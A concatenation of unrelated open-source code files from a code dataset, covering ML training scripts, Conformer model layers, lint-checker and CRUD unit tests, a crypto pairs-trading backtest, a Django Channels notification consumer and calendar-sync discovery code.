dataset = JsonlTypedASTDataset(
holdout_file, self._vocabulary, self._config, holdout == self._train, self._is_pointer
)
batch_size = self._config.batch_size if holdout == self._train else self._config.test_batch_size
return DataLoader(
dataset, batch_size, shuffle=shuffle, num_workers=self._config.num_workers, collate_fn=self._collate_batch
)
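# A minimal usage sketch (the config keys mirror the ones accessed above, though a
# real config typically carries more; the concrete values and data folder are
# assumptions, and the folder is expected to already contain the jsonl holdouts):
#
#   config = DictConfig({"labels_count": 27000, "tokens_count": 190000,
#                        "batch_size": 16, "test_batch_size": 32, "num_workers": 2})
#   datamodule = JsonlASTDatamodule(config, "data/java-small")
#   train_loader = datamodule.train_dataloader()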
|
the-stack_106_23904 | # (C) 2019 Baris Ozmen <[email protected]>
import pathlib
import logging
import os
import datetime
import sys
from os.path import dirname, realpath
file_path = realpath(__file__)
dir_of_file = dirname(file_path)
parent_dir_of_file = dirname(dir_of_file)
sys.path.insert(0, dir_of_file)
now = datetime.datetime.now()
EXPERIMENT_NAME = (
f"wrn_28_10_{now.year}-{now.month:02}-{now.day:02}_{now.hour:02}-{now.minute:02}"
)
EXPERIMENT_FOLDER_PATH = os.path.join(
parent_dir_of_file, f"reports/experiments/{EXPERIMENT_NAME}"
)
log_path = pathlib.Path(EXPERIMENT_FOLDER_PATH)
log_path.mkdir(parents=True, exist_ok=True)
logging.basicConfig(filename=(log_path / "info.log").absolute(), level=logging.DEBUG)
from childcnn import ChildCNN
from build_features import DataOp
from lib.decorators import Reporter
from image_generator import deepaugment_image_generator
logger = Reporter.logger
from keras.callbacks import CSVLogger
import click
from sklearn.model_selection import train_test_split
import logging
# @click.command()
# @click.option("--dataset-name", type=click.STRING, default="cifar10")
# @click.option("--num-classes", type=click.INT, default=10)
# @click.option("--epochs", type=click.INT, default=15)
# @click.option("--batch-size", type=click.INT, default=64)
# @click.option("--policies-path", type=click.STRING, default="dont_augment")
@logger(logfile_dir=EXPERIMENT_FOLDER_PATH)
def run_full_model(images, labels, test_proportion=0.1, model="wrn_28_10", epochs=200, batch_size=64, policies_path="dont_augment"):
data={}
data["X_train"], data["X_val"], data["y_train"], data["y_val"] = train_test_split(images, labels, test_size=test_proportion, shuffle=True)
data = DataOp.preprocess_normal(data)
input_shape = data["X_train"][0].shape
num_classes = data["y_train"].shape[1]
cnn_config={
"model" : model,
"weights" : "imagenet",
"input_shape" : input_shape,
"child_batch_size" : batch_size,
"pre_augmentation_weights_path" : "initial_model_weights.h5",
"logging" : logging
}
full_model = ChildCNN(
input_shape=input_shape,
num_classes=num_classes,
config=cnn_config
)
if policies_path == "dont_augment":
policy_str = "non_augmented"
else:
policy_str = "augmented"
csv_logger = CSVLogger(
f"{EXPERIMENT_FOLDER_PATH}/wrn_28_10_training_on_{policy_str}.csv"
)
if policies_path == "dont_augment":
history = full_model.fit_normal(data, epochs=epochs, csv_logger=csv_logger)
print(f"Reached validation accuracy is {history['val_acc'][-1]}")
else:
datagen = deepaugment_image_generator(
data["X_train"],
data["y_train"],
policies_path,
batch_size=batch_size,
augment_chance=0.8,
)
print("fitting the model")
history = full_model.fit_with_generator(
datagen,
data["X_val"],
data["y_val"],
train_data_size=len(data["X_train"]),
epochs=epochs,
csv_logger=csv_logger,
)
print(f"Reached validation accuracy is {history['val_acc'][-1]}")
if __name__ == "__main__":
run_full_model()
|
the-stack_106_23905 |
import types
from unittest.mock import AsyncMock, MagicMock, PropertyMock
import pytest
from aio.core import directory
from envoy.code import check
async def test_glint_have_newlines(patches):
patched = patches(
"NewlineChecker",
prefix="envoy.code.check.abstract.glint")
path = MagicMock()
paths = [MagicMock() for i in range(0, 3)]
with patched as (m_newlines, ):
assert (
check.AGlintCheck.have_newlines(path, *paths)
== m_newlines.return_value.have_newlines.return_value)
assert (
m_newlines.call_args
== [(path, ), {}])
assert (
m_newlines.return_value.have_newlines.call_args
== [(tuple(paths), ), {}])
def test_glint_constructor():
glint = check.AGlintCheck("DIRECTORY")
assert glint.directory == "DIRECTORY"
@pytest.mark.parametrize("files", [True, False])
async def test_glint_checker_files(patches, files):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
"set",
("AGlintCheck.noglint_re",
dict(new_callable=PropertyMock)),
prefix="envoy.code.check.abstract.glint")
files = AsyncMock(return_value=range(0, 20))
directory.files = files()
with patched as (m_set, m_re):
m_re.return_value.match.side_effect = lambda x: x % 2
assert (
await glint.checker_files
== m_set.return_value)
iterator = m_set.call_args[0][0]
called = list(iterator)
assert (
called
== [x for x in range(0, 20)
if not x % 2])
assert (
m_re.return_value.match.call_args_list
== [[(x, ), {}] for x in range(0, 20)])
assert not (
hasattr(
glint,
check.AGlintCheck.checker_files.cache_name))
async def test_glint_files_with_mixed_tabs(patches):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
("AGlintCheck.files_with_preceeding_tabs",
dict(new_callable=PropertyMock)),
prefix="envoy.code.check.abstract.glint")
directory.grep = AsyncMock()
with patched as (m_tabs, ):
tabs = AsyncMock()
m_tabs.side_effect = tabs
assert (
await glint.files_with_mixed_tabs
== directory.grep.return_value)
assert (
directory.grep.call_args
== [(["-lP", r"^ "], ),
dict(target=tabs.return_value)])
assert not (
hasattr(
glint,
check.AGlintCheck.files_with_mixed_tabs.cache_name))
async def test_glint_files_with_preceeding_tabs(patches):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
("AGlintCheck.files",
dict(new_callable=PropertyMock)),
prefix="envoy.code.check.abstract.glint")
directory.grep = AsyncMock()
with patched as (m_files, ):
files = AsyncMock()
m_files.side_effect = files
assert (
await glint.files_with_preceeding_tabs
== directory.grep.return_value)
assert (
directory.grep.call_args
== [(["-lP", r"^\t"], ),
dict(target=files.return_value)])
assert not (
hasattr(
glint,
check.AGlintCheck.files_with_preceeding_tabs.cache_name))
async def test_glint_files_with_no_newline(patches):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
"partial",
("AGlintCheck.files",
dict(new_callable=PropertyMock)),
"AGlintCheck.execute_in_batches",
"AGlintCheck.have_newlines",
prefix="envoy.code.check.abstract.glint")
batched = [
set(x for x in range(0, 10)),
set(x for x in range(1, 7)),
set(x for x in range(5, 13))]
expected = batched[0] | batched[1] | batched[2]
async def batch_iter(x):
for batch in batched:
yield batch
with patched as (m_partial, m_files, m_execute, m_newlines):
m_files.side_effect = AsyncMock(
[f"FILE{i}" for i in range(0, 5)])
m_execute.side_effect = batch_iter
assert (
await glint.files_with_no_newline
== expected)
assert not (
hasattr(
glint,
check.AGlintCheck.files_with_no_newline.cache_name))
assert (
m_execute.call_args
== [(m_partial.return_value, *m_files.return_value), {}])
assert (
m_partial.call_args
== [(m_newlines, directory.path), {}])
async def test_glint__check_problems(patches):
glint = check.AGlintCheck("DIRECTORY")
patched = patches(
"list",
"AGlintCheck._check_path",
prefix="envoy.code.check.abstract.glint")
batched = [
set(x for x in range(0, 10)),
set(x for x in range(1, 7)),
set(x for x in range(5, 13))]
expected = batched[0] | batched[1] | batched[2]
with patched as (m_list, m_check):
assert (
await glint._check_problems(batched)
== {p: m_list.return_value
for p in expected})
assert (
m_list.call_args_list
== [[(m_check.return_value, ), {}]
for p
in expected])
assert (
m_check.call_args_list
== [[(p, *batched), {}]
for p
in expected])
@pytest.mark.parametrize("files", [[], [f"F{i}" for i in range(0, 5)]])
async def test_glint_files_with_trailing_whitespace(patches, files):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
("AGlintCheck.files",
dict(new_callable=PropertyMock)),
prefix="envoy.code.check.abstract.glint")
directory.grep = AsyncMock()
with patched as (m_files, ):
files = AsyncMock()
m_files.side_effect = files
assert (
await glint.files_with_trailing_whitespace
== directory.grep.return_value)
assert (
directory.grep.call_args
== [(["-lE", r"[[:blank:]]$"], ),
dict(target=files.return_value)])
assert not (
hasattr(
glint,
check.AGlintCheck.files_with_trailing_whitespace.cache_name))
def test_glint_noglint_re(patches):
glint = check.AGlintCheck("DIRECTORY")
patched = patches(
"re",
prefix="envoy.code.check.abstract.glint")
with patched as (m_re, ):
assert (
glint.noglint_re
== m_re.compile.return_value)
assert (
m_re.compile.call_args
== [("|".join(check.abstract.glint.NOGLINT_RE), ),
{}])
assert "noglint_re" in glint.__dict__
@pytest.mark.parametrize("files", [True, False])
async def test_glint_problem_files(patches, files):
glint = check.AGlintCheck("DIRECTORY")
patched = patches(
"asyncio",
("AGlintCheck.files",
dict(new_callable=PropertyMock)),
("AGlintCheck.files_with_no_newline",
dict(new_callable=PropertyMock)),
("AGlintCheck.files_with_mixed_tabs",
dict(new_callable=PropertyMock)),
("AGlintCheck.files_with_trailing_whitespace",
dict(new_callable=PropertyMock)),
"AGlintCheck._check_problems",
prefix="envoy.code.check.abstract.glint")
with patched as patchy:
(m_asyncio, m_files, m_newline, m_tabs,
m_ws, m_checks) = patchy
m_files.side_effect = AsyncMock(return_value=files)
gather = AsyncMock()
m_asyncio.gather = gather
assert (
await glint.problem_files
== (m_checks.return_value
if files
else {})
== getattr(
glint,
check.AGlintCheck.problem_files.cache_name)[
"problem_files"])
if not files:
assert not m_checks.called
assert not gather.called
assert not m_newline.called
assert not m_tabs.called
assert not m_ws.called
return
assert (
m_checks.call_args
== [(gather.return_value, ), {}])
assert (
gather.call_args
== [(m_newline.return_value,
m_tabs.return_value,
m_ws.return_value), {}])
@pytest.mark.parametrize(
"newline", [[], ["PATH", "other"], ["PATH"], ["no", "path"]])
@pytest.mark.parametrize(
"mixed_tabs", [[], ["PATH", "other"], ["PATH"], ["no", "path"]])
@pytest.mark.parametrize(
"whitespace", [[], ["PATH", "other"], ["PATH"], ["no", "path"]])
def test_glint__check_path(patches, newline, mixed_tabs, whitespace):
glint = check.AGlintCheck("DIRECTORY")
expected = []
if "PATH" in newline:
expected.append("Missing final newline: PATH")
if "PATH" in mixed_tabs:
expected.append("Mixed preceeding tabs and whitespace: PATH")
if "PATH" in whitespace:
expected.append("Trailing whitespace: PATH")
assert (
list(glint._check_path("PATH", newline, mixed_tabs, whitespace))
== expected)
def test_glint_newline_checker_constructor():
nl_checker = check.abstract.glint.NewlineChecker("PATH")
assert isinstance(nl_checker, directory.IDirectoryContext)
assert isinstance(nl_checker, directory.ADirectoryContext)
@pytest.mark.parametrize("n", range(1, 5))
def test_glint_newline_checker_have_newlines(patches, n):
nl_checker = check.abstract.glint.NewlineChecker("PATH")
patched = patches(
"set",
("NewlineChecker.in_directory",
dict(new_callable=PropertyMock)),
"utils",
prefix="envoy.code.check.abstract.glint")
paths = [MagicMock() for x in range(0, 5)]
class Byter:
counter = 0
def last_n_bytes_of(self, target):
self.counter += 1
if self.counter % n:
return b"\n"
return "OTHER"
byter = Byter()
with patched as (m_set, m_dir_ctx, m_utils):
m_utils.last_n_bytes_of.side_effect = byter.last_n_bytes_of
assert (
nl_checker.have_newlines(paths)
== m_set.return_value)
pathgen = m_set.call_args[0][0]
assert isinstance(pathgen, types.GeneratorType)
assert (
list(pathgen)
== [p
for i, p
in enumerate(paths)
if not bool((i + 1) % n)])
assert m_dir_ctx.return_value.__enter__.called
assert (
m_utils.last_n_bytes_of.call_args_list
== [[(p, ), {}]
for p in paths])
|
the-stack_106_23906 | import sys, os
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + '/../')
import torch
from torch import nn
from torch.optim import Adam
from torch.nn.init import xavier_normal as xavier
import matplotlib.pyplot as plt
from data.loader import cryptoData
from models.model import MLPRegressor
DEVICE = torch.device("cpu")
COIN1 = "eth"
COIN2 = "btc"
MODEL = "norm"
class Residual(object):
def __init__(self,dataloader_coin1,dataloader_coin2):
self.dataloader_coin1 = dataloader_coin1
self.dataloader_coin2 = dataloader_coin2
def zScore(self,upperIndex,out_coin1,out_coin2):
coin1_30 = self.dataloader_coin1.getDataFrame(upperIndex,20)
coin2_30 = self.dataloader_coin2.getDataFrame(upperIndex,20)
coin1_30 = torch.cat((coin1_30,out_coin1))
coin2_30 = torch.cat((coin2_30,out_coin2))
        meanDifference30 = torch.mean(coin1_30 - coin2_30)
        standardDev30 = torch.std(coin1_30 - coin2_30)
coin1_5 = self.dataloader_coin1.getDataFrame(upperIndex,5)
coin2_5 = self.dataloader_coin2.getDataFrame(upperIndex,5)
coin1_5 = torch.cat((coin1_5,out_coin1))
coin2_5 = torch.cat((coin2_5,out_coin2))
        meanDifference5 = torch.mean(coin1_5 - coin2_5)
if standardDev30 > 0:
            return (meanDifference5 - meanDifference30) / standardDev30, self.riskModel(coin1_30, coin2_30)
else:
return 0, self.riskModel(coin1_30,coin2_30)
def riskModel(self,coin1_30,coin2_30):
c1 = coin1_30 - coin1_30.mean()
c2 = coin2_30 - coin2_30.mean()
corr = torch.sum(c1*c2) / (torch.sqrt(torch.sum(c1 ** 2)) * torch.sqrt(torch.sum(c2 ** 2)))
if corr > 0.9:
risk = False
else:
risk = True
return risk
def getGeneralTrends(dataloader,upperIndex):
upper = dataloader.getDataFrame(upperIndex,10).mean()
lower = dataloader.getDataFrame(upperIndex,30).mean()
return upper/lower
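# Note: the pieces above feed a simple pairs-trading loop in main() below.
# Roughly, with the thresholds hard-coded there (1, -1, 0.9, trendThreshold = 1):
#
#   zScore, risk = residualModel.zScore(i, out_coin1, out_coin2)
#   # zScore > 1  -> coin1 looks rich vs coin2  -> swap coin1 holdings into coin2
#   # zScore < -1 -> coin1 looks cheap vs coin2 -> swap coin2 holdings into coin1
#   # riskModel() blocks both trades when the correlation of the recent price
#   # windows falls below 0.9
#   # getGeneralTrends() (10-day mean / 30-day mean) must exceed trendThreshold
#   # for the coin being bought before a swap is executed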
def main(COIN1,COIN2):
model_coin1 = MLPRegressor(coin=COIN1,model= MODEL)
model_coin1.to(DEVICE)
model_coin2 = MLPRegressor(coin=COIN2,model= MODEL)
model_coin2.to(DEVICE)
dataloader_coin1 = cryptoData(COIN1,DEVICE=DEVICE,model=MODEL)
DAYS_coin1 = len(dataloader_coin1)
dataloader_coin2 = cryptoData(COIN2,DEVICE=DEVICE,model=MODEL)
DAYS_coin2 = len(dataloader_coin2)
model_coin1.eval(dataloader_coin1[0][0])
model_coin2.eval(dataloader_coin2[0][0])
residualModel = Residual(dataloader_coin1,dataloader_coin2)
coin1_amt = 0
coin2_amt = 0
cash = 0
startDay = 34
trendThreshold = 1
shorts = longs = holds = 0
time = 0
for i in range(startDay,min(DAYS_coin1,DAYS_coin2)):
time+=1
x_coin1,target_coin1 = dataloader_coin1[i]
x_coin2,target_coin2 = dataloader_coin2[i]
price_coin1 = dataloader_coin1.getDataFrame(i,1)
price_coin2 = dataloader_coin2.getDataFrame(i,1)
if i == startDay:
coin1_amt = 5000/ price_coin1
coin2_amt = 5000/ price_coin2
out_coin1 = model_coin1(x_coin1)
out_coin2 = model_coin2(x_coin2)
zScore, risk = residualModel.zScore(i,out_coin1,out_coin2)
trend_coin1 = getGeneralTrends(dataloader_coin1,i)
trend_coin2 = getGeneralTrends(dataloader_coin2,i)
if not risk:
if zScore > 1:
shorts+=1
if trend_coin2 > trendThreshold:
temp = coin1_amt* price_coin1
coin1_amt = 0
coin2_amt += (temp / price_coin2)
# print("\t",i,"Transaction: short at ",price_coin1.item(),price_coin2.item())
elif zScore < -1:
longs+=1
if trend_coin1 > trendThreshold:
temp = coin2_amt* price_coin2
coin2_amt = 0
coin1_amt += (temp / price_coin1)
# print("\t",i,"Transaction: long at ",price_coin1.item(),price_coin2.item())
else:
holds+=1
out_coin1 = out_coin1.item()*dataloader_coin1.pmax.item()
out_coin2 = out_coin2.item()*dataloader_coin2.pmax.item()
print(COIN1,COIN2,"\n\t",(coin1_amt * price_coin1) + (coin2_amt * price_coin2) + cash)
print(time,'\n')
if __name__ == "__main__":
main("eth","btc")
main("eth","ltc")
main("ltc","btc") |
the-stack_106_23909 | import binascii
import ctypes
import json
import logging
import traceback
from datetime import date, datetime, timedelta
from pathlib import Path
from channels.db import database_sync_to_async
from channels.generic.websocket import WebsocketConsumer
from django.core.exceptions import ObjectDoesNotExist
from django.utils import timezone
from notif.models import Notification
from notif.models_serializers import NotificationSerializer
from rest_framework.authtoken.models import Token
logger = logging.getLogger("notif")
class PushNotifConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.token: str = None
self.user = None
def connect(self):
try:
self.accept()
self.token = self.scope["url_route"]["kwargs"]["token"]
db_tok = Token.objects.get(key=self.token)
self.user = db_tok.user
self.user.settings.push_channel = self.channel_name
self.user.settings.save()
logger.info("Accepted")
except Exception as e:
            print(traceback.format_exc())
logging.error(traceback.format_exc())
def disconnect(self, close_code):
try:
self.user.settings.push_channel = None
self.user.settings.save()
except Exception as e:
print(traceback.format_exc())
logging.error(traceback.format_exc())
def receive(self, text_data):
event = json.loads(text_data)
logger.info("{} >> {}".format(self.user, text_data))
event_handler = getattr(self, event["type"].lower().replace(".", "_"), None)
if callable(event_handler):
event_handler(event)
def notify(self, data: dict):
self.send(json.dumps(data))
def notification(self, data: dict):
self.send(json.dumps(data))
def unread(self, event: dict):
notifs = Notification.objects.filter(user=self.user, read__isnull=True)
event["count"] = len(notifs)
event["notifications"] = NotificationSerializer(notifs, many=True).data
self.send(json.dumps(event))
def markread(self, event: dict):
notifs = Notification.objects.filter(user=self.user, read__isnull=True)
notifs.update(read=timezone.now())
event["success"] = True
self.send(json.dumps(event))
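# Example wiring (sketch; the route prefix and token pattern are placeholders,
# not taken from this project): connect() reads
# self.scope["url_route"]["kwargs"]["token"], so the websocket route must
# capture a ``token`` kwarg. With Channels 3.x routing that would look like:
#
#   from django.urls import re_path
#   websocket_urlpatterns = [
#       re_path(r"ws/notif/(?P<token>[0-9a-f]+)/$", PushNotifConsumer.as_asgi()),
#   ]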
|
the-stack_106_23910 | import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
import math
class Conv2dSubsampling(nn.Module):
def __init__(self, input_dim, output_dim, dropout=0.0):
"""
:param input_dim: the log mel feature (normally 40)
:param output_dim: network size (512)
:param dropout: dropout rate
"""
super(Conv2dSubsampling, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
# first conv is nn.Conv2d(1, output_dim, 3, 2)
        # second conv is nn.Conv2d(output_dim, output_dim, 3, 2)
self.in_conv_weight = nn.Parameter(torch.Tensor(output_dim, 1, 3, 3))
self.in_conv_bias = nn.Parameter(torch.Tensor(output_dim))
self.in_stride = 2
self.out_conv_weight = nn.Parameter(torch.Tensor(output_dim, output_dim, 3, 3))
self.out_conv_bias = nn.Parameter(torch.Tensor(output_dim))
self.out_stride = 2
cnn_feature_size = output_dim * (((input_dim - 1) // 2 - 1) // 2)
self.out_weight = nn.Parameter(torch.Tensor(output_dim, cnn_feature_size))
self.out_bias = nn.Parameter(torch.Tensor(output_dim))
self.dropout = dropout
self.reset_parameters()
def reset_parameters(self):
nn.init.kaiming_uniform_(self.in_conv_weight, a=math.sqrt(5))
nn.init.kaiming_uniform_(self.out_conv_weight, a=math.sqrt(5))
fan_in, _ = init._calculate_fan_in_and_fan_out(self.in_conv_weight)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.in_conv_bias, -bound, bound)
fan_in, _ = init._calculate_fan_in_and_fan_out(self.out_conv_weight)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.out_conv_bias, -bound, bound)
std_ = math.sqrt(2.0 / (self.output_dim + self.output_dim))
nn.init.normal_(self.out_weight, 0.0, std_)
nn.init.constant_(self.out_bias, 0.)
return
def forward(self, input, input_mask):
"""
:param input: [bsz x seq_len x input_size]
:param input_mask: [bsz x seq_len]
:return:
"""
input = input.unsqueeze(1) # [bsz x 1 x seq_len x input_size]
# padding = 0, dilation = 1, groups = 1
input = F.conv2d(input, self.in_conv_weight, self.in_conv_bias, self.in_stride, 0, 1, 1)
input = F.relu(input)
input = F.conv2d(input, self.out_conv_weight, self.out_conv_bias, self.out_stride, 0, 1, 1)
input = F.relu(input)
b, c, t, f = input.size()
input = input.transpose(1, 2).contiguous().view(b, t, c * f)
input = F.linear(input, self.out_weight, self.out_bias)
# input = F.dropout(input, p=self.dropout, training=self.training)
mask = input_mask[:, :-2:2][:, :-2:2]
return input, mask
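# Shape note: each Conv2d above uses kernel 3, stride 2 and no padding, so the
# time axis shrinks as t -> (t - 1) // 2 per conv (e.g. t = 1000 -> 499 -> 249).
# The slicing ``input_mask[:, :-2:2][:, :-2:2]`` applies the same reduction to
# the padding mask, and ``cnn_feature_size = output_dim * (((input_dim - 1) // 2
# - 1) // 2)`` in __init__ is the matching reduction of the feature axis.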
class ConformerConvBlock(nn.Module):
def __init__(self, channels, kernel_size, activation=nn.ReLU(), bias=True):
super(ConformerConvBlock, self).__init__()
assert (kernel_size - 1) % 2 == 0
self.pointwise_conv1 = nn.Conv1d(channels, 2*channels, kernel_size=1, stride=1, padding=0, bias=bias)
self.depthwise_conv = nn.Conv1d(channels, channels, kernel_size, stride=1,
padding=(kernel_size - 1) // 2, groups=channels, bias=bias)
self.batch_norm = nn.BatchNorm1d(channels)
self.pointwise_conv2 = nn.Conv1d(channels, channels, kernel_size=1, stride=1, padding=0, bias=bias)
self.activation = activation
# self.in_pointwise_weight = nn.Conv1d(channels, 2*channels, kernel_size=1, stride=1, padding=0, bias=False)
# self.in_pointwise_bias = nn.Parameter(torch.Tensor(2 * channels))
#
# self.depthwise_weight = nn.Parameter(torch.Tensor(channels, channels // channels, kernel_size))
# self.depthwise_bias = nn.Parameter(torch.Tensor(channels))
# self.padding = (kernel_size - 1) // 2
# self.groups = channels
#
# self.norm = nn.BatchNorm1d(channels)
# self.out_pointwise_weight = nn.Parameter(torch.Tensor(channels, channels, 1))
# self.out_pointwise_bias = nn.Parameter(torch.Tensor(channels))
#
# self.activation = activation
self.reset_parameters()
def reset_parameters(self):
nn.init.kaiming_normal_(self.pointwise_conv1.weight, nonlinearity='relu')
nn.init.kaiming_normal_(self.depthwise_conv.weight, nonlinearity='relu')
nn.init.kaiming_normal_(self.pointwise_conv2.weight, nonlinearity='relu')
nn.init.constant_(self.pointwise_conv1.bias, 0)
nn.init.constant_(self.pointwise_conv2.bias, 0)
nn.init.constant_(self.depthwise_conv.bias, 0)
# nn.init.kaiming_uniform_(self.in_pointwise_weight, a=math.sqrt(5))
# nn.init.kaiming_uniform_(self.depthwise_weight, a=math.sqrt(5))
# nn.init.kaiming_uniform_(self.out_pointwise_weight, a=math.sqrt(5))
#
# fan_in, _ = init._calculate_fan_in_and_fan_out(self.in_pointwise_weight)
# bound = 1 / math.sqrt(fan_in)
# init.uniform_(self.in_pointwise_bias, -bound, bound)
#
# fan_in, _ = init._calculate_fan_in_and_fan_out(self.depthwise_weight)
# bound = 1 / math.sqrt(fan_in)
# init.uniform_(self.depthwise_bias, -bound, bound)
#
# fan_in, _ = init._calculate_fan_in_and_fan_out(self.out_pointwise_weight)
# bound = 1 / math.sqrt(fan_in)
# init.uniform_(self.out_pointwise_bias, -bound, bound)
def forward(self, x, pad_mask=None):
"""
:param pad_mask: [seq_len x bsz] indicating which element is correct
(this should be the same with the attention mask (pad=1, unpad=0)
:param x: [seq_len x bsz x hidden_size]
:return:
"""
x = x.transpose(0, 1).transpose(1, 2) # to [bsz x hidden_size x seq_len]
# pointwise conv does not need to mask because its elementwise projection
x = self.pointwise_conv1(x)
x = F.glu(x, dim=1)
# if pad_mask is not None:
# pad_mask = pad_mask.transpose(0, 1).transpose(1, 2)
# # print(x.size(), pad_mask.size())
# x = x.masked_fill_(pad_mask, 0)
x = self.depthwise_conv(x)
x = self.activation(self.batch_norm(x))
x = self.pointwise_conv2(x)
# x = F.conv1d(x, self.in_pointwise_weight, self.in_pointwise_bias, 1, 0, 1, 1)
# x = F.glu(x, dim=1)
#
# x = F.conv1d(x, self.depthwise_weight, self.depthwise_bias, 1, self.padding, 1, self.groups)
# x = self.activation(x)
#
# x = F.conv1d(x, self.out_pointwise_weight, self.out_pointwise_bias, 1, 0, 1, 1)
x = x.transpose(1, 2).transpose(0, 1) # back to [seq_len x bsz x hidden_size]
return x
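# Data-flow summary for ConformerConvBlock.forward(): input [seq_len x bsz x
# channels] is transposed to [bsz x channels x seq_len] for the 1D convolutions,
# then passed through pointwise conv (2x channels) -> GLU gate -> depthwise conv
# -> BatchNorm -> activation -> pointwise conv, and transposed back. This is the
# usual Conformer convolution-module ordering; residual connections and dropout
# are left to the caller.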
if __name__ == "__main__":
bsz = 160
seq_len = 1000
input_size = 48
output_size = 128
kernel = 31
subsampler = Conv2dSubsampling(input_size, output_size)
subsampler = subsampler.cuda()
conv = ConformerConvBlock(output_size, kernel)
conv = conv.cuda()
input = torch.randn(seq_len, bsz, input_size)
mask = torch.randn(bsz, seq_len)
input = input.cuda()
mask = mask.cuda()
input, mask = subsampler(input.transpose(0, 1), mask)
print(input.size())
print(mask.size())
output = conv(input.transpose(0, 1))
print(output.size())
|
the-stack_106_23913 | from arches.app.models.system_settings import settings
from arches.app.utils.betterJSONSerializer import JSONSerializer
from arches.app.search.components.base import BaseSearchFilter
details = {
"searchcomponentid": "",
"name": "Saved",
"icon": "fa fa-bookmark",
"modulename": "saved_searches.py",
"classname": "SavedSearches",
"type": "popup",
"componentpath": "views/components/search/saved-searches",
"componentname": "saved-searches",
"sortorder": "2",
"enabled": True,
}
class SavedSearches(BaseSearchFilter):
def view_data(self):
ret = {}
ret["saved_searches"] = settings.SAVED_SEARCHES
return ret
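# Note: the ``details`` dict above is the registration metadata for this search
# component (module/class names, the front-end component under
# ``componentpath``/``componentname``, sort order and enabled flag);
# view_data() only has to expose ``settings.SAVED_SEARCHES`` to that component.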
|
the-stack_106_23914 | import pytest
from literature.crud.editor_crud import create, show, patch, destroy, show_changesets
from sqlalchemy import create_engine
from sqlalchemy import MetaData
# from literature import models
from literature.models import (
Base, EditorModel
)
from literature.schemas import EditorSchemaPost
from literature.database.config import SQLALCHEMY_DATABASE_URL
from sqlalchemy.orm import sessionmaker
from fastapi import HTTPException
metadata = MetaData()
engine = create_engine(SQLALCHEMY_DATABASE_URL, connect_args={"options": "-c timezone=utc"})
SessionLocal = sessionmaker(bind=engine, autoflush=True)
db = SessionLocal()
# Add tables/schema if not already there.
Base.metadata.create_all(engine)
# If this is not a test database, exit immediately.
if "literature-test" not in SQLALCHEMY_DATABASE_URL:
exit(-1)
def test_get_bad_editor():
with pytest.raises(HTTPException):
show(db, 99999)
def test_create_editor():
xml = {
"order": 1,
"first_name": "string",
"last_name": "string",
"name": "003_TCU",
"orcid": "ORCID:2345-2345-2345-234X",
"reference_curie": "AGR:AGR-Reference-0000000001"
}
res = create(db, xml)
assert res
# check db for editor
editor = db.query(EditorModel).filter(EditorModel.name == "003_TCU").one()
assert editor.first_name == "string"
def test_create_editor_for_ref_later():
xml = {
"order": 2,
"first_name": "string2",
"last_name": "string3",
"name": "Name2",
"orcid": "ORCID:3333-4444-5555-666X",
"reference_curie": "AGR:AGR-Reference-0000000001"
}
res = create(db, xml)
assert res
# check db for editor
editor = db.query(EditorModel).filter(EditorModel.name == "Name2").one()
assert editor.first_name == "string2"
def test_patch_editor():
xml = {'first_name': "003_TUA",
'orcid': "ORCID:5432-5432-5432-432X",
'reference_curie': 'AGR:AGR-Reference-0000000003'}
editor = db.query(EditorModel).filter(EditorModel.name == "003_TCU").one()
ed_schem = EditorSchemaPost(**xml)
res = patch(db, editor.editor_id, ed_schem)
assert res
mod_editor = db.query(EditorModel).filter(EditorModel.first_name == "003_TUA").one()
assert editor.editor_id == mod_editor.editor_id
assert mod_editor.orcid == "ORCID:5432-5432-5432-432X"
def test_show_editor():
editor = db.query(EditorModel).filter(EditorModel.first_name == "003_TUA").one()
edi = show(db, editor.editor_id)
assert edi['orcid'] == "ORCID:5432-5432-5432-432X"
def test_changesets():
editor = db.query(EditorModel).filter(EditorModel.first_name == "003_TUA").one()
res = show_changesets(db, editor.editor_id)
# Orcid changed from None -> ORCID:2345-2345-2345-234X -> ORCID:5432-5432-5432-432X
for transaction in res:
if not transaction['changeset']['orcid'][0]:
assert transaction['changeset']['orcid'][1] == 'ORCID:2345-2345-2345-234X'
else:
assert transaction['changeset']['orcid'][0] == 'ORCID:2345-2345-2345-234X'
assert transaction['changeset']['orcid'][1] == 'ORCID:5432-5432-5432-432X'
def test_destroy_editor():
editor = db.query(EditorModel).filter(EditorModel.first_name == "003_TUA").one()
destroy(db, editor.editor_id)
# It should now give an error on lookup.
with pytest.raises(HTTPException):
show(db, editor.editor_id)
# Deleting it again should give an error as the lookup will fail.
with pytest.raises(HTTPException):
destroy(db, editor.editor_id)
|
the-stack_106_23915 | import asyncio
import hashlib
import json
import logging
import sys
import aiohttp
import aiostream
from . import cli_logger
from .. import exceptions
from .utils import handle_collection_not_found
from .utils import handle_collection_was_removed
from .utils import handle_storage_init_error
from .utils import load_status
from .utils import save_status
from .utils import storage_class_from_config
from .utils import storage_instance_from_config
# Increase whenever upgrade potentially breaks discovery cache and collections
# should be re-discovered
DISCOVERY_CACHE_VERSION = 1
logger = logging.getLogger(__name__)
def _get_collections_cache_key(pair):
m = hashlib.sha256()
j = json.dumps(
[
DISCOVERY_CACHE_VERSION,
pair.collections,
pair.config_a,
pair.config_b,
],
sort_keys=True,
)
m.update(j.encode("utf-8"))
return m.hexdigest()
async def collections_for_pair(
status_path,
pair,
from_cache=True,
list_collections=False,
*,
connector: aiohttp.TCPConnector,
):
"""Determine all configured collections for a given pair. Takes care of
shortcut expansion and result caching.
:param status_path: The path to the status directory.
:param from_cache: Whether to load from cache (aborting on cache miss) or
discover and save to cache.
:returns: iterable of (collection, (a_args, b_args))
"""
cache_key = _get_collections_cache_key(pair)
if from_cache:
rv = load_status(status_path, pair.name, data_type="collections")
if rv and rv.get("cache_key", None) == cache_key:
return list(_expand_collections_cache(
rv['collections'], pair.config_a, pair.config_b
))
